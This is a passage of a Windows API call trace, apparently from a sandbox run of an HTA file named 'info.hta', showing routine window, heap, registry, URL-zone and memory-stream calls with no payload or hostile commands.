lpMem=0x4b0f70 | out: hHeap=0x470000) returned 1 [0224.508] SetWindowPos (hWnd=0x30198, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0224.509] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.509] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x46, wParam=0x0, lParam=0x41f8b4*=197016, plResult=0x41f750 | out: plResult=0x41f750) returned 0x1 [0224.509] NtdllDefWindowProc_W () returned 0x0 [0224.509] GetCurrentThreadId () returned 0x390 [0224.512] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0224.512] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x47, wParam=0x0, lParam=0x41f8b4*=197016, plResult=0x41f74c | out: plResult=0x41f74c) returned 0x1 [0224.512] NtdllDefWindowProc_W () returned 0x0 [0224.512] GetCurrentThreadId () returned 0x390 [0224.512] SetTimer (hWnd=0x30198, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0224.512] GetFocus () returned 0x0 [0224.512] EnumChildWindows (hWndParent=0x30198, lpEnumFunc=0x74260a73, lParam=0x41f7ac) returned 0 [0224.518] GetFocus () returned 0x0 [0224.518] SetFocus (hWnd=0x30198) returned 0x0 [0224.518] NtdllDefWindowProc_W () returned 0x0 [0224.518] NtdllDefWindowProc_W () returned 0x0 [0225.531] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x41f174 | out: plResult=0x41f174) returned 0x0 [0225.532] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0225.532] GetKeyState (nVirtKey=1) returned 0 [0225.532] GetKeyState (nVirtKey=2) returned 0 [0225.532] GetKeyState (nVirtKey=16) returned 0 [0225.532] GetKeyState (nVirtKey=17) returned 0 [0225.532] GetKeyState (nVirtKey=4) returned 0 [0225.532] GetKeyState (nVirtKey=18) returned 0 [0225.532] GetMessageTime () returned 0 [0225.532] GetMessagePos () returned 0x0 [0225.532] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x41eba4 | out: plResult=0x41eba4) returned 0x0 [0225.532] GetCurrentThreadId () returned 0x390 [0225.532] GetCurrentThreadId () returned 0x390 [0225.532] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0225.667] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c1680 | out: hHeap=0x470000) returned 1 [0225.667] GetCurrentThreadId () returned 0x390 [0225.667] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be230 | out: hHeap=0x470000) returned 1 [0225.667] GetCurrentThreadId () returned 0x390 [0225.667] GetCurrentThreadId () returned 0x390 [0225.667] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x41f564 | out: plResult=0x41f564) returned 0x1 [0225.667] NtdllDefWindowProc_W () returned 0x0 [0225.667] GetCurrentThreadId () returned 0x390 [0225.667] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x4a4cd0, hWnd=0x30198, phIMC=0x41f88c | out: phIMC=0x41f88c*=0x400f3) returned 0x0 [0225.668] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x4a4cd0, hWnd=0x30198, hIME=0x0, phPrev=0x41f88c | out: phPrev=0x41f88c*=0x400f3) returned 0x0 [0225.668] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x60) returned 0x4bafb0 [0225.668] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bafb0 | out: hHeap=0x470000) returned 1 [0225.668] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x60) returned 0x4bafb0 [0225.668] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bafb0 | out: hHeap=0x470000) returned 1 [0225.668] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b11b0 | out: hHeap=0x470000) returned 1 [0225.669] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b1180 | out: hHeap=0x470000) returned 1 [0225.669] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0225.669] GetKeyState (nVirtKey=1) returned 0 [0225.669] GetKeyState (nVirtKey=2) returned 0 [0225.669] GetKeyState (nVirtKey=16) returned 0 [0225.669] GetKeyState (nVirtKey=17) returned 0 [0225.669] GetKeyState (nVirtKey=4) returned 0 [0225.669] GetKeyState (nVirtKey=18) returned 0 [0225.669] GetMessageTime () returned 0 [0225.669] GetMessagePos () returned 0x0 [0225.669] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x41f574 | out: plResult=0x41f574) returned 0x0 [0225.669] GetCurrentThreadId () returned 0x390 [0225.669] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0225.669] GetKeyState (nVirtKey=1) returned 0 [0225.669] GetKeyState (nVirtKey=2) returned 0 [0225.669] GetKeyState (nVirtKey=16) returned 0 [0225.669] GetKeyState (nVirtKey=17) returned 0 [0225.669] GetKeyState (nVirtKey=4) returned 0 [0225.669] GetKeyState (nVirtKey=18) returned 0 [0225.669] GetMessageTime () returned 0 [0225.669] GetMessagePos () returned 0x0 [0225.669] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4a4cd0, hWnd=0x30198, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x41f574 | out: plResult=0x41f574) returned 0x0 [0225.670] GetCurrentThreadId () returned 0x390 [0225.670] IsOS (dwOS=0x25) returned 1 [0225.670] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f780 | out: phkResult=0x41f780*=0x214) returned 0x0 [0225.670] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f784 | out: phkResult=0x41f784*=0x218) returned 0x0 [0225.670] RegOpenKeyExW (in: hKey=0x218, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x41f740 | out: phkResult=0x41f740*=0x0) returned 0x2 [0225.670] RegOpenKeyExW (in: hKey=0x214, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x41f740 | out: phkResult=0x41f740*=0x21c) returned 0x0 [0225.670] SHRegGetValueW () returned 0x0 [0225.670] RegCloseKey (hKey=0x21c) returned 0x0 [0225.670] RegCloseKey (hKey=0x0) returned 0x6 [0225.670] RegCloseKey (hKey=0x0) returned 0x6 [0225.670] RegCloseKey (hKey=0x214) returned 0x0 [0225.670] RegCloseKey (hKey=0x218) returned 0x0 [0225.671] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x71da0000 [0225.676] GetVersionExW (in: lpVersionInformation=0x41f28c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x41f28c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.676] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x71da0000 [0225.676] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x41f808, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.868] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x41f868, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.868] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x4b1180 [0225.869] LoadStringW (in: hInstance=0x71da0000, uID=0xb5, lpBuffer=0x41f854, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0225.869] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41e23c | out: ppURI=0x41e23c*=0x49c07c) returned 0x0 [0225.869] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41e214 | out: ppvObject=0x41e214*=0x49c07c) returned 0x0 [0225.869] IUnknown:Release (This=0x49c07c) returned 0x4 [0225.869] IUnknown:AddRef (This=0x49c07c) returned 0x5 [0225.869] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x72) returned 0x4825e8 [0225.869] IUnknown:Release (This=0x49c07c) returned 0x4 [0225.869] IUnknown:Release (This=0x49c07c) returned 0x3 [0225.869] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100) returned 0x4e7d90 [0225.869] FindResourceW (hModule=0x71da0000, lpName=0x1fe, lpType=0x6) returned 0x22084d0 [0225.869] LoadResource (hModule=0x71da0000, hResInfo=0x22084d0) returned 0x222e53c [0225.869] LockResource (hResData=0x222e53c) returned 0x222e53c [0225.869] VirtualQuery (in: lpAddress=0x222e53c, lpBuffer=0x41f3e4, dwLength=0x1c | out: lpBuffer=0x41f3e4*(BaseAddress=0x222e000, AllocationBase=0x1f50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.870] SizeofResource (hModule=0x71da0000, hResInfo=0x22084d0) returned 0xe6 [0225.870] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4825e8 | out: hHeap=0x470000) returned 1 [0225.870] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4e7d90, Size=0x90) returned 0x4e7d90 [0225.870] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x94) returned 0x4cde88 [0225.870] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x484a40 [0225.870] RegisterDragDrop (hwnd=0x30198, pDropTarget=0x744796cc) returned 0x0 [0225.870] GetCurrentThreadId () returned 0x390 [0225.871] GetCurrentThreadId () returned 0x390 [0225.871] GetCurrentThreadId () returned 0x390 [0225.871] GetCurrentThreadId () returned 0x390 [0225.871] GetMessageW (in: lpMsg=0x41fac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x41fac4) returned 1 [0225.871] TranslateMessage (lpMsg=0x41fac4) returned 0 [0225.871] DispatchMessageW (lpMsg=0x41fac4) returned 0x0 [0225.871] GetMessageW (in: lpMsg=0x41fac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x41fac4) returned 1 [0225.871] TranslateMessage (lpMsg=0x41fac4) returned 0 [0225.871] DispatchMessageW (lpMsg=0x41fac4) returned 0x0 [0225.871] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0225.871] KillTimer (hWnd=0x30198, uIDEvent=0x1000) returned 1 [0225.918] IUnknown:AddRef (This=0x49c07c) returned 0x4 [0225.918] IUri:GetScheme (in: This=0x49c07c, pdwScheme=0x41edfc | out: pdwScheme=0x41edfc*=0x9) returned 0x0 [0225.918] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41eddc | out: ppvObject=0x41eddc*=0x49c07c) returned 0x0 [0225.918] IUnknown:Release (This=0x49c07c) returned 0x4 [0225.918] IUnknown:AddRef (This=0x49c07c) returned 0x5 [0225.918] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pszPath=0x41ee30, pcchPath=0x41ee10, dwFlags=0x0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta", pcchPath=0x41ee10) returned 0x0 [0225.918] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x62) returned 0x4c28f8 [0225.918] IUnknown:Release (This=0x49c07c) returned 0x4 [0225.918] GetWindowTextW (in: hWnd=0x20156, lpString=0x41e9a8, nMaxCount=512 | out: lpString="") returned 0 [0225.918] NtdllDefWindowProc_W () returned 0x0 [0225.918] SetWindowTextW (hWnd=0x20156, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta") returned 1 [0225.918] NtdllDefWindowProc_W () returned 0x1 [0225.919] IUnknown:Release (This=0x49c07c) returned 0x3 [0225.919] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c28f8 | out: hHeap=0x470000) returned 1 [0225.919] GetCurrentThreadId () returned 0x390 [0225.919] GetMessageW (in: lpMsg=0x41fac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x41fac4) returned 1 [0225.919] TranslateMessage (lpMsg=0x41fac4) returned 0 [0225.919] DispatchMessageW (lpMsg=0x41fac4) [0225.935] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f5a0 | out: ppu=0x41f5a0) returned 0x0 [0225.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0225.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0225.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0225.935] StrCmpNICW (lpStr1="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.935] StrStrIW (lpFirst="", lpSrch="http://www.w3.org/TR/REC-html40/strict.dtd") returned 0x0 [0225.935] StrStrIW (lpFirst="", lpSrch="DTD XHTML") returned 0x0 [0225.935] StrStrIW (lpFirst="", lpSrch="DTD HTML 4") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.935] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0225.935] StrStrIW (lpFirst="", lpSrch="DTD XHTML 1.0") returned 0x0 [0225.935] StrStrIW (lpFirst="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0225.935] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0225.935] StrStrIW (lpFirst="", lpSrch=" Transitional//") returned 0x0 [0225.935] StrStrIW (lpFirst="", lpSrch=" Frameset//") returned 0x0 [0225.936] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e0678 | out: hHeap=0x470000) returned 1 [0225.936] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x34) returned 0x4af940 [0225.936] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae640 [0225.936] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4e07b8 [0225.936] GetTickCount () returned 0x20666 [0225.937] SetTimer (hWnd=0x30198, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0225.937] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0225.937] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4ae698 [0225.937] IUnknown:AddRef (This=0x49c07c) returned 0x4 [0225.937] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f58c, dwFlags=0x0 | out: pdwZone=0x41f58c*=0xffffffff) returned 0x800c0011 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.937] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0225.937] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x2106, pPolicy=0x41f590, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x41f590*=0x0) returned 0x0 [0225.938] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0225.938] IUnknown:Release (This=0x49c07c) returned 0x3 [0225.938] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e07b8 | out: hHeap=0x470000) returned 1 [0225.938] GetTickCount () returned 0x20666 [0225.963] GetTickCount () returned 0x20685 [0226.163] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c28f8 | out: hHeap=0x470000) returned 1 [0226.164] GetSystemDefaultLCID () returned 0x409 [0226.164] GetVersionExW (in: lpVersionInformation=0x41f530*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x290073, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x41f530*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.164] GetKeyboardLayoutList (in: nBuff=32, lpList=0x41f4b0 | out: lpList=0x41f4b0) returned 1 [0226.164] GetSystemMetrics (nIndex=4096) returned 0 [0226.164] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0226.164] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0226.164] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0226.164] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0226.164] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0226.164] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0226.164] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0226.165] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0226.165] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2c) returned 0x4be230 [0226.419] CBaseMoniker::AddRef () returned 0x2 [0226.419] IUnknown:AddRef (This=0x4805d8) returned 0x3 [0226.419] IsAsyncMoniker (pmk=0x4805d8) returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.419] CMemStm::Write () returned 0x0 [0226.420] CMemStm::Write () returned 0x0 [0226.420] CMemStm::Write () returned 0x0 [0226.420] CMemStm::Write () returned 0x0 [0226.420] CMemStm::Release () returned 0x1 [0226.420] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.420] IUnknown:Release (This=0x4805d8) returned 0x2 [0226.420] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.420] CMemStm::Seek () returned 0x0 [0226.420] GetFocus () returned 0x30198 [0226.420] GetCursorPos (in: lpPoint=0x41f6f0 | out: lpPoint=0x41f6f0*(x=449, y=50)) returned 1 [0226.420] ScreenToClient (in: hWnd=0x30198, lpPoint=0x41f6f0 | out: lpPoint=0x41f6f0) returned 1 [0226.420] GetClientRect (in: hWnd=0x30198, lpRect=0x41f6e0 | out: lpRect=0x41f6e0) returned 1 [0226.420] GetCurrentProcessId () returned 0x380 [0226.420] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e11a8 | out: hHeap=0x470000) returned 1 [0226.421] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b11e0 | out: hHeap=0x470000) returned 1 [0226.421] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c2888 | out: hHeap=0x470000) returned 1 [0226.421] IUnknown:Release (This=0x49bd1c) returned 0xe [0226.421] IUnknown:Release (This=0x4a3d90) returned 0x3 [0226.421] IUnknown:Release (This=0x49bd1c) returned 0xd [0226.421] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.421] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.421] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4db660 | out: hHeap=0x470000) returned 1 [0226.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e6fa0 | out: hHeap=0x470000) returned 1 [0226.422] IUnknown:Release (This=0x49bd1c) returned 0xc [0226.422] IUnknown:Release (This=0x4a3d90) returned 0x2 [0226.422] IUnknown:Release (This=0x49bd1c) returned 0xb [0226.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b4ad8 | out: hHeap=0x470000) returned 1 [0226.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b2048 | out: hHeap=0x470000) returned 1 [0226.423] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae900 [0226.423] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4e07d0 [0226.423] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2000) returned 0x4e0fc0 [0226.423] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4ae958 [0226.423] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41f520 | out: ppURI=0x41f520*=0x49b9a4) returned 0x0 [0226.423] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="about:blank", pdwZone=0x41f524, dwFlags=0x0 | out: pdwZone=0x41f524*=0xffffffff) returned 0x800c0011 [0226.423] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.423] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.423] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.423] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x41f528, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x41f528*=0x0) returned 0x0 [0226.423] IUnknown:Release (This=0x49b9a4) returned 0x2 [0226.423] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2c) returned 0x48d888 [0226.465] CMemStm::Clone () returned 0x0 [0226.468] CBaseMoniker::AddRef () returned 0x2 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x72) returned 0x4825e8 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x72) returned 0x482668 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4b3a68 [0226.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4bedf0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.468] CMemStm::Read () returned 0x0 [0226.469] CMemStm::Read () returned 0x0 [0226.469] CMemStm::Read () returned 0x0 [0226.469] CMemStm::Release () returned 0x1 [0226.469] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.469] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppmk=0x41f6f8*=0x0, dwFlags=0x1 | out: ppmk=0x41f6f8*=0x4afa00) returned 0x0 [0226.469] GetFocus () returned 0x30198 [0226.469] GetCursorPos (in: lpPoint=0x41f440 | out: lpPoint=0x41f440*(x=449, y=50)) returned 1 [0226.469] ScreenToClient (in: hWnd=0x30198, lpPoint=0x41f440 | out: lpPoint=0x41f440) returned 1 [0226.469] GetClientRect (in: hWnd=0x30198, lpRect=0x41f430 | out: lpRect=0x41f430) returned 1 [0226.469] IUnknown:AddRef (This=0x4afa00) returned 0x2 [0226.469] IUnknown:QueryInterface (in: This=0x4afa00, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x41f470 | out: ppvObject=0x41f470*=0x4afa0c) returned 0x0 [0226.469] IUriContainer:GetIUri (in: This=0x4afa0c, ppIUri=0x41f4c4 | out: ppIUri=0x41f4c4*=0x49c07c) returned 0x0 [0226.469] IUnknown:Release (This=0x4afa0c) returned 0x2 [0226.469] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x4e7648 [0226.469] IUnknown:AddRef (This=0x4afa00) returned 0x3 [0226.469] IUnknown:AddRef (This=0x49c07c) returned 0x7 [0226.469] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f49c | out: ppvObject=0x41f49c*=0x49c07c) returned 0x0 [0226.469] IUnknown:Release (This=0x49c07c) returned 0x7 [0226.469] IUnknown:AddRef (This=0x49c07c) returned 0x8 [0226.469] IUri:GetScheme (in: This=0x49c07c, pdwScheme=0x41f494 | out: pdwScheme=0x41f494*=0x9) returned 0x0 [0226.469] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xc8) returned 0x4b2048 [0226.469] GetCurrentProcessId () returned 0x380 [0226.469] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f49c | out: ppvObject=0x41f49c*=0x49c07c) returned 0x0 [0226.470] IUnknown:Release (This=0x49c07c) returned 0x8 [0226.470] IUnknown:AddRef (This=0x49c07c) returned 0x9 [0226.470] IUri:GetScheme (in: This=0x49c07c, pdwScheme=0x41f46c | out: pdwScheme=0x41f46c*=0x9) returned 0x0 [0226.470] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f420 | out: 